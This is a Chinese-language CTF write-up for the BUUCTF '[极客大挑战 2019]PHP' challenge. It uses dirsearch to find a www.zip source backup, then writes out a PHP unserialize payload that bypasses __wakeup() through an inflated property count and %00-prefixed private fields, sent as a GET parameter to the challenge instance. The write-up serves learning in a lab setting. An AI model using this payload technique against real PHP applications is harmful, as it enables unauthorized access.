[极客大挑战 2019]PHP 【dirsearch】【序列化与反序列化】

CTF-Web-[极客大挑战 2019]PHP

博客说明

文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！

CTP平台

网址

https://buuoj.cn/challenges

题目

打开题目的实例

思路

看到这种题目，我爱了

特别是这个动画效果，做安全的前端也这么优秀吗？大佬

不过我发下一个问题，这个动画搞的我打不开源代码了，我去，不过这个题也不需要用到，说到文件备份，首先把网站的目录给爆破出来，使用dirsearch

dirsearch

一款基于python3的目录爆破工具

下载地址

https://github.com/maurosoria/dirsearch

使用

-u 指定url

-e 指定网站语言

-w 可以加上自己的字典（带上路径）

-r 递归跑（查到一个目录后，在目录后在重复跑，很慢，不建议用）

进入dirsearch目录后

执行./dirsearch.py -u 127.0.0.1 -e php类似的目录，这里我们使用

./dirsearch.py -u http://71f04e34-1537-41f0-8c4f-e3de12f432b9.node3.buuoj.cn -e php

里面文件是真的多，不过我只要备份的文件

在网址后面直接加上www.zip，下载到本地解压查看，发现了这么一些文件

打开index.php文件

在里面有一段这样的话，里面加载了一个class.php文件，然后采用get传递一个select参数，随后将之反序列化

打开class.php

根据代码的意思可以知道，如果password=100，username=admin，在执行__destruct()的时候可以获得flag，所以我们需要达成这些要求

保存文件执行一次

得到的序列化为，建议手动去打一遍

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

到了这一步，问题就来了，在反序列化的时候会首先执行__wakeup()魔术方法，但是这个方法会把我们的username重新赋值，所以我们要考虑的就是怎么跳过__wakeup()，而去执行__destruct

跳过__wakeup()

在反序列化字符串时，属性个数的值大于实际属性个数时，会跳过 __wakeup()函数的执行

因此我们将序列化这样设置

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

不过还是没有结束，因为这个声明变量是private

private

private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上0的前缀。字符串长度也包括所加前缀的长度

我们再次改造一下序列化

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

测试

使用get请求把我们准备好的序列化当作select的参数传递过去

http://c7c61c82-0812-45e5-a51a-0b8c123f19ad.node3.buuoj.cn/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

前面网址记得换成自己的就行

flag到手，最后一句这个猫好可爱，想偷走，哈哈哈！

感谢

BUUCTF

以及勤劳的自己